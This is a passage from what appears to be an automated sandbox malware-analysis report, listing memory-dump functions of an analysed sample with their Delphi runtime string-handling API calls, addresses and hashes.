                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@Unicode$System@@$String$StringiiSysutils@$AnsiCopy$qqrx20ExtractFileFromInternalStr$qqrr20Stringx27System@%T$us$i0$%$Delete$qqrr20Delimiter$qqrx20Drive$qqrx20LastPath$qqrx20Stringt1
                                                                                                  • String ID:
                                                                                                  • API String ID: 2728986464-0
                                                                                                  • Opcode ID: 753f7e1a6c6c97bbf24396121e6cbfb91f1a8a2250ef5da3e68a7d15cb4d6440
                                                                                                  • Instruction ID: b42390ce6f7e2cc3f0a2e75dff1ecda8a9c22fa8fff3ef8285b34e87ebe0e190
                                                                                                  • Opcode Fuzzy Hash: 753f7e1a6c6c97bbf24396121e6cbfb91f1a8a2250ef5da3e68a7d15cb4d6440
                                                                                                  • Instruction Fuzzy Hash: 36F0C230714A889FDB05CFBCDC9195D77E8EB8D210F6046B6F404D3381EA34DE429694
                                                                                                  Function 5000D1EC Relevance: 6.0, APIs: 4, Instructions: 41COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @System@@LStrToString$qqrv.RTL120(00000000,5000D25A,?,?,?,00000000), ref: 5000D229
                                                                                                  • @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5000D25A,?,?,?,00000000), ref: 5000D235
                                                                                                  • @System@UTF8EncodeToShortString$qqrx20System@UnicodeString.RTL120(00000000,5000D25A,?,?,?,00000000), ref: 5000D23F
                                                                                                    • Part of subcall function 5000D160: @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5000D1E0,?,?,?,?,?,50007075), ref: 5000D199
                                                                                                    • Part of subcall function 5000D160: @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(?,00000000,5000D1E0,?,?,?,?,?,50007075), ref: 5000D1AD
                                                                                                    • Part of subcall function 5000D160: @System@UnicodeToUtf8$qqrpcuipbui.RTL120(?,00000000,5000D1E0,?,?,?,?,?,50007075), ref: 5000D1BC
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@$Unicode$StringSystem@@$AnsiFromStr$qqrr20Stringx27System@%T$us$i0$%$Char$qqrx20EncodeInternalShortString$qqrvString$qqrx20Utf8$qqrpcuipbui
                                                                                                  • String ID:
                                                                                                  • API String ID: 3607580448-0
                                                                                                  • Opcode ID: fb3adfc1b616c63d37c10a095645c24805800dc440cd7556cb7450fc6099ad38
                                                                                                  • Instruction ID: 1c16621e2cb8d67273f367093e7f4ec9039ce1562dd6be5a7fed7262e5487efd
                                                                                                  • Opcode Fuzzy Hash: fb3adfc1b616c63d37c10a095645c24805800dc440cd7556cb7450fc6099ad38
                                                                                                  • Instruction Fuzzy Hash: E8F0C238705AC4ABF7109EA5997156A72E9EBA8600FD18273F900C3641DA74DD0392A0
                                                                                                  Function 5000B610 Relevance: 6.0, APIs: 4, Instructions: 41COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5000B67E), ref: 5000B64C
                                                                                                    • Part of subcall function 50008994: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(?,500089BC,50006B15,00000000,50006B69), ref: 50008999
                                                                                                  • @System@@WStrFromPWCharLen$qqrr17System@WideStringpbi.RTL120(00000000,5000B67E), ref: 5000B663
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: FromSystem@System@@$AnsiStr$qqrr20StringStringx27System@%T$us$i0$%Unicode$CharInternalLen$qqrr17StringpbiWide
                                                                                                  • String ID:
                                                                                                  • API String ID: 3836375802-0
                                                                                                  • Opcode ID: 121b1d7daa110de507159fd92aaf49f5188387cc7d6252307e2916458b3dc339
                                                                                                  • Instruction ID: 5ba6b1cf659b0eac9df44331a80376275ae431139069cf899d630c05516daaeb
                                                                                                  • Opcode Fuzzy Hash: 121b1d7daa110de507159fd92aaf49f5188387cc7d6252307e2916458b3dc339
                                                                                                  • Instruction Fuzzy Hash: 12016D30A00688DFEB11DFB8D96259DB7F9EB85300BE046B2E504E3254EB35DF10DA40
                                                                                                  Function 5000D0AC Relevance: 6.0, APIs: 4, Instructions: 40COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @System@@LStrAsg$qqrpvpxv.RTL120(00000000,5000D115,?,?,?,00000000), ref: 5000D0E4
                                                                                                  • @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5000D115,?,?,?,00000000), ref: 5000D0F0
                                                                                                  • @System@UTF8Encode$qqrx20System@UnicodeString.RTL120(00000000,5000D115,?,?,?,00000000), ref: 5000D0FA
                                                                                                    • Part of subcall function 5000CF8C: @System@@LStrClr$qqrpv.RTL120(00000000,5000D09C), ref: 5000CFB7
                                                                                                    • Part of subcall function 5000CF8C: @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5000D09C), ref: 5000CFDE
                                                                                                    • Part of subcall function 5000CF8C: @System@@LStrSetLength$qqrv.RTL120(00000000,5000D09C), ref: 5000CFF9
                                                                                                    • Part of subcall function 5000CF8C: @System@@InternalLStrFromUStr$qqrr27System@%AnsiStringT$us$i0$%x20System@UnicodeStringus.RTL120(00000000,5000D09C), ref: 5000D01A
                                                                                                    • Part of subcall function 5000CF8C: @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(00000000,00000000,5000D09C), ref: 5000D02E
                                                                                                    • Part of subcall function 5000CF8C: @System@@LStrToPChar$qqrx27System@%AnsiStringT$us$i0$%.RTL120(00000000,00000000,00000000,5000D09C), ref: 5000D037
                                                                                                    • Part of subcall function 5000CF8C: @System@UnicodeToUtf8$qqrpcuipbui.RTL120(00000000,00000000,5000D09C), ref: 5000D040
                                                                                                    • Part of subcall function 5000CF8C: @System@@LStrSetLength$qqrv.RTL120(00000000,00000000,5000D09C), ref: 5000D056
                                                                                                    • Part of subcall function 5000CF8C: @System@@LStrAsg$qqrpvpxv.RTL120(00000000,00000000,5000D09C), ref: 5000D06A
                                                                                                    • Part of subcall function 5000CF8C: @System@@LStrClr$qqrpv.RTL120(5000D0A3), ref: 5000D08E
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@@$System@$StringUnicode$AnsiSystem@%$FromT$us$i0$%$Asg$qqrpvpxvClr$qqrpvInternalLength$qqrvStr$qqrr20Stringx27$Char$qqrx20Char$qqrx27Encode$qqrx20Str$qqrr27StringusT$us$i0$%x20Utf8$qqrpcuipbui
                                                                                                  • String ID:
                                                                                                  • API String ID: 307145936-0
                                                                                                  • Opcode ID: 08819d0066f00755660bc180d09a58690c32542b5e0c166a016e8ed3854df67c
                                                                                                  • Instruction ID: 80467bac8e14cd6db259491f32d78e6933cbc81cdce2657633e505d679178eb2
                                                                                                  • Opcode Fuzzy Hash: 08819d0066f00755660bc180d09a58690c32542b5e0c166a016e8ed3854df67c
                                                                                                  • Instruction Fuzzy Hash: F9F08B38704AC8ABF7109FA49C7166973EEDB84600FE04133F900C3601DB74DD0791A4
                                                                                                  Function 50016C40 Relevance: 6.0, APIs: 4, Instructions: 40COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @Strutils@Soundex$qqrx20System@UnicodeStringi.RTL120(00000000,50016CA3,?,?,?,?,00000000,00000000), ref: 50016C65
                                                                                                    • Part of subcall function 5001671C: @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,500168A1), ref: 50016752
                                                                                                    • Part of subcall function 5001671C: @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,500168A1), ref: 50016782
                                                                                                    • Part of subcall function 5001671C: @System@@UStrFromWChar$qqrr20System@UnicodeStringb.RTL120(00000000,500168A1), ref: 500167A2
                                                                                                    • Part of subcall function 5001671C: @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,500168A1), ref: 500167CD
                                                                                                    • Part of subcall function 5001671C: @Sysutils@IntToStr$qqri.RTL120(00000000,500168A1), ref: 500167FE
                                                                                                    • Part of subcall function 5001671C: @System@@UStrCat$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,500168A1), ref: 50016808
                                                                                                  • @Strutils@Soundex$qqrx20System@UnicodeStringi.RTL120(?,00000000,50016CA3,?,?,?,?,00000000,00000000), ref: 50016C75
                                                                                                    • Part of subcall function 5001671C: @Strutils@DupeString$qqrx20System@UnicodeStringi.RTL120(?,00000000,500168A1), ref: 50016854
                                                                                                    • Part of subcall function 5001671C: @System@@UStrCat3$qqrr20System@UnicodeStringx20System@UnicodeStringt2.RTL120(?,00000000,500168A1), ref: 50016861
                                                                                                    • Part of subcall function 5001671C: @System@@UStrCopy$qqrx20System@UnicodeStringii.RTL120(?,00000000,500168A1), ref: 50016871
                                                                                                  • @System@@UStrEqual$qqrv.RTL120(00000000,50016CA3,?,?,?,?,00000000,00000000), ref: 50016C7E
                                                                                                    • Part of subcall function 5000A45C: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,00000000), ref: 5000A3B7
                                                                                                    • Part of subcall function 5000A45C: @System@@UStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,00000000), ref: 5000A3CC
                                                                                                    • Part of subcall function 5000A45C: @System@@LStrArrayClr$qqrpvi.RTL120(00000000,00000000), ref: 5000A44F
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@Unicode$System@@$String$From$AnsiStr$qqrr20Stringx27System@%T$us$i0$%$StringiStringx20Strutils@$InternalSoundex$qqrx20$ArrayAsg$qqrr20Cat$qqrr20Cat3$qqrr20Char$qqrr20Clr$qqrpviCopy$qqrx20DupeEqual$qqrvStr$qqriString$qqrx20StringbStringiiStringt2Sysutils@
                                                                                                  • String ID:
                                                                                                  • API String ID: 2206128752-0
                                                                                                  • Opcode ID: af3f8dfbe0403c831ef66ca4008089e9c1e8404da604cf0db340d0fe81840fef
                                                                                                  • Instruction ID: 9212367c84ca732909122d909e52c0543b39d14d0cecfb00a627868e9b79e0b5
                                                                                                  • Opcode Fuzzy Hash: af3f8dfbe0403c831ef66ca4008089e9c1e8404da604cf0db340d0fe81840fef
                                                                                                  • Instruction Fuzzy Hash: 3AF02B3A7042486FD701CAE5DC91AAEB7ADDB8D210F614176F504D3341D934DE018194
                                                                                                  Function 50016CB4 Relevance: 6.0, APIs: 4, Instructions: 39COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @Strutils@Soundex$qqrx20System@UnicodeStringi.RTL120(00000000,50016D14,?,?,?,?,00000000,00000000), ref: 50016CD9
                                                                                                    • Part of subcall function 5001671C: @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,500168A1), ref: 50016752
                                                                                                    • Part of subcall function 5001671C: @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,500168A1), ref: 50016782
                                                                                                    • Part of subcall function 5001671C: @System@@UStrFromWChar$qqrr20System@UnicodeStringb.RTL120(00000000,500168A1), ref: 500167A2
                                                                                                    • Part of subcall function 5001671C: @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,500168A1), ref: 500167CD
                                                                                                    • Part of subcall function 5001671C: @Sysutils@IntToStr$qqri.RTL120(00000000,500168A1), ref: 500167FE
                                                                                                    • Part of subcall function 5001671C: @System@@UStrCat$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120(00000000,500168A1), ref: 50016808
                                                                                                  • @Strutils@Soundex$qqrx20System@UnicodeStringi.RTL120(?,00000000,50016D14,?,?,?,?,00000000,00000000), ref: 50016CE9
                                                                                                    • Part of subcall function 5001671C: @Strutils@DupeString$qqrx20System@UnicodeStringi.RTL120(?,00000000,500168A1), ref: 50016854
                                                                                                    • Part of subcall function 5001671C: @System@@UStrCat3$qqrr20System@UnicodeStringx20System@UnicodeStringt2.RTL120(?,00000000,500168A1), ref: 50016861
                                                                                                    • Part of subcall function 5001671C: @System@@UStrCopy$qqrx20System@UnicodeStringii.RTL120(?,00000000,500168A1), ref: 50016871
                                                                                                  • @Sysutils@AnsiCompareStr$qqrx20System@UnicodeStringt1.RTL120(00000000,50016D14,?,?,?,?,00000000,00000000), ref: 50016CF2
                                                                                                    • Part of subcall function 50019FDC: @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001A098), ref: 5001A020
                                                                                                    • Part of subcall function 50019FDC: @System@@InternalUStrFromLStr$qqrr20System@UnicodeStringx27System@%AnsiStringT$us$i0$%.RTL120(00000000,5001A098), ref: 5001A048
                                                                                                    • Part of subcall function 50019FDC: @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(?,00000000,5001A098), ref: 5001A05C
                                                                                                    • Part of subcall function 50019FDC: @System@@UStrToPWChar$qqrx20System@UnicodeString.RTL120(?,00000000,?,00000000,5001A098), ref: 5001A066
                                                                                                    • Part of subcall function 50019FDC: CompareStringW.KERNEL32(00000400,00000000,00000000,?,00000000,?,00000000,5001A098), ref: 5001A073
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@Unicode$System@@$String$AnsiFrom$InternalStr$qqrr20Stringx27System@%T$us$i0$%$StringiStringx20Strutils@$Char$qqrx20CompareSoundex$qqrx20Sysutils@$Asg$qqrr20Cat$qqrr20Cat3$qqrr20Char$qqrr20Copy$qqrx20DupeStr$qqriStr$qqrx20String$qqrx20StringbStringiiStringt1Stringt2
                                                                                                  • String ID:
                                                                                                  • API String ID: 848067345-0
                                                                                                  • Opcode ID: d47b1065cc661f0fcdedfbc1c7e3849fc8159ff95937f3d3b0d532aaeb83b732
                                                                                                  • Instruction ID: a9308b81826aa0c780e1c50b45dfbe856d660fbecc3233872d1bb9e489c68cf2
                                                                                                  • Opcode Fuzzy Hash: d47b1065cc661f0fcdedfbc1c7e3849fc8159ff95937f3d3b0d532aaeb83b732
                                                                                                  • Instruction Fuzzy Hash: BDF0B4357042847BD701CAD5EC91AAEB7EDDB8D610FA14176F504D3381DA74DE418594
                                                                                                  Function 50009390 Relevance: 6.0, APIs: 4, Instructions: 38COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @System@@WStrLen$qqrx17System@WideString.RTL120(00000000,500093F1,?,?,?,?,00000000,?,5000938F), ref: 500093AE
                                                                                                  • @System@@LStrFromWStr$qqrr27System@%AnsiStringT$us$i0$%x17System@WideStringus.RTL120(00000000,500093F1,?,?,?,?,00000000,?,5000938F), ref: 500093C8
                                                                                                  • @System@@WriteLString$qqrr15System@TTextRecx27System@%AnsiStringT$us$i0$%i.RTL120(00000000,500093F1,?,?,?,?,00000000,?,5000938F), ref: 500093D4
                                                                                                  • @System@@LStrClr$qqrpv.RTL120(500093F8,?,?,?,00000000,?,5000938F), ref: 500093EB
                                                                                                    • Part of subcall function 500087A8: @System@@FreeMem$qqrpv.RTL120(?,50004445,5000444D), ref: 500087C4
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@@$StringSystem@$AnsiSystem@%Wide$Clr$qqrpvFreeFromLen$qqrx17Mem$qqrpvRecx27Str$qqrr27String$qqrr15StringusT$us$i0$%iT$us$i0$%x17TextWrite
                                                                                                  • String ID:
                                                                                                  • API String ID: 1130800983-0
                                                                                                  • Opcode ID: b849d90925cc33044c776b6e4e2f5848c8cfe3ce250f7a05f47d86eedd24106f
                                                                                                  • Instruction ID: ef5ea901b8e5fa30709b5689cebf9e2eb1ad37d003b92d6465d3830585f69d9b
                                                                                                  • Opcode Fuzzy Hash: b849d90925cc33044c776b6e4e2f5848c8cfe3ce250f7a05f47d86eedd24106f
                                                                                                  • Instruction Fuzzy Hash: DFF059307042846BEB14CAB8AC71A4EB2DDDB89600FE18577B500C3381DD30DE018690
                                                                                                  Function 5000D5D0 Relevance: 6.0, APIs: 4, Instructions: 38COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @System@FindResourceHInstance$qqrui.RTL120(00010000,?,00001000), ref: 5000D60F
                                                                                                  • LoadStringW.USER32(00000000,00010000,?,00001000), ref: 5000D615
                                                                                                  • @System@@UStrFromPWCharLen$qqrr20System@UnicodeStringpbi.RTL120 ref: 5000D620
                                                                                                  • @System@@UStrFromPWChar$qqrr20System@UnicodeStringpb.RTL120 ref: 5000D62C
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@$FromSystem@@Unicode$CharChar$qqrr20FindInstance$qqruiLen$qqrr20LoadResourceStringStringpbStringpbi
                                                                                                  • String ID:
                                                                                                  • API String ID: 2990883651-0
                                                                                                  • Opcode ID: 55ca08126530cfa26b8a12066b7b7f1d4282c8620ddcc8f6fe61370ac2b4a099
                                                                                                  • Instruction ID: 492cc944b019d22fa5aeb3a5e8639eadf2eec20015de2a4354c3fe8e2fc88a12
                                                                                                  • Opcode Fuzzy Hash: 55ca08126530cfa26b8a12066b7b7f1d4282c8620ddcc8f6fe61370ac2b4a099
                                                                                                  • Instruction Fuzzy Hash: E7F02EB4701A808BFB10CA8CD8E2F8A73DC8B18201F808223B94CCB346DA21DD0183A2
                                                                                                  Function 5000472C Relevance: 6.0, APIs: 4, Instructions: 38COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • @System@@UStrAsg$qqrr20System@UnicodeStringx20System@UnicodeString.RTL120 ref: 5000473D
                                                                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000105), ref: 50004752
                                                                                                  • @System@@UStrFromPWCharLen$qqrr20System@UnicodeStringpbi.RTL120(00000000,?,00000105), ref: 5000475D
                                                                                                    • Part of subcall function 50009E7C: @System@@NewUnicodeString$qqri.RTL120(?,?,?,50004762,00000000,?,00000105), ref: 50009E87
                                                                                                    • Part of subcall function 50009E7C: @System@Move$qqrpxvpvi.RTL120(?,?,?,50004762,00000000,?,00000105), ref: 50009E9A
                                                                                                    • Part of subcall function 50009E7C: @System@@LStrClr$qqrpv.RTL120(?,?,?,50004762,00000000,?,00000105), ref: 50009EA1
                                                                                                  • GetCommandLineW.KERNEL32 ref: 50004764
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.1807286649.0000000050001000.00000020.00000001.01000000.00000004.sdmp, Offset: 50000000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.1807270397.0000000050000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807910894.000000005009C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807927393.000000005009D000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807958181.00000000500AA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1807975086.00000000500AB000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500AD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.00000000500FD000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.1808022147.0000000050113000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_50000000_IDRBackup.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: System@System@@Unicode$Asg$qqrr20CharClr$qqrpvCommandFileFromLen$qqrr20LineModuleMove$qqrpxvpviNameStringString$qqriStringpbiStringx20
                                                                                                  • String ID:
                                                                                                  • API String ID: 2864874161-0
                                                                                                  • Opcode ID: b2b830a017bee59d4e872495292ad1b13696414d59f0388ff4c3bb92921b499a
                                                                                                  • Instruction ID: 6a03e17f4bd4c64ae8d53e0fe39c767496f35d0f4fe9983f0094101a5260a8ef
